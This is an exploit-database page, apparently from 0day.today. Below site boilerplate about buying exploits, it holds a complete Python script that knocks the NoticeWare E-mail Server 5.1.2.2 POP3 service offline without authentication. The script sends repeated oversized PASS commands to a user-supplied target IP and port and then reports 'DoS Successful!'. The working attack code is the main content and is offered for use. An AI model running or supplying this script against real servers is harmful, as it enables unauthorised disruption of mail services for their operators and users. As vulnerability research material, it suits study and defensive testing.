0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit
============================================================ NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit ============================================================ #!/usr/bin/python ################################################################################# # Software: NoticeWare E-mail Sever (POP3) 5.1.2.2 Pre-Auth DoS # # Discovered and Coded by: Paul Hand aka rAWjAW # # Blog: http://rawjaw-security.blogspot.com # # E-mail: phand3754<at>gmail<dot>com # # # # Description: NoticeWare E-mail Server has many odd querks about it # # This DoS leverages the fact that the POP3 server can only handle # # so many exceptions before you get an access violation at 0x00000008 # # which is given from an EDX+8 where EDX is 0x00000000. # # I've tried many things to get code execution and non are prevalent. # # If you fuzz almost any of the commands for the POP3 server you will get it to # # crash. Also, if you are authenticated and do "LIST 0.5" (numerous times) you # # will get the same access violation you do with this DoS. # # # #Company Contact Date: 10-3-08 (But still no response) # ################################################################################# import socket import sys from optparse import OptionParser usage = "%prog -T <Target_IP> -P <Target_Port>" parser = OptionParser(usage=usage) parser.add_option("-T", "--target_IP", type="string", action="store", dest="IP", help="Target IP Address") parser.add_option("-P", "--target_Port", type="int", action="store", dest="PORT", help="Target Port Address (usually 110)") (options, args) = parser.parse_args() IP=options.IP PORT=options.PORT if not (IP and PORT): parser.print_help() sys.exit(0) buffer='\x42'*1000 print "########################################################" print "# NoticeWare Email DoS #" print "# Written by: Paul Hand aka rAWjAW #" print "# #" print "# NOTE: The program does not seem to always crash at #" print "# the same point for some reason so if the script #" print "# hangs because of a \"faulty\" closed connection just #" print "# just CTRL+C and that means the POP3 server has been #" print "# successfully DoSed. The program will still \"allow\" #" print "# connections but they will just hang and cannot be #" print "# used. #" print "########################################################" try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((IP,PORT)) s.close() except socket.error, message: print "Could not make initial connection. Quitting" sys.exit(0) print "Connection to the target successful" print "Sending buffers..." x=1 while x < 50: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((IP,PORT)) s.recv(1024) #You DO NOT need a vaild username s.send('USER admin\r\n') s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.recv(1024) s.close() x=x+1 print "DoS Successful!" # 0day.today [2024-11-16] #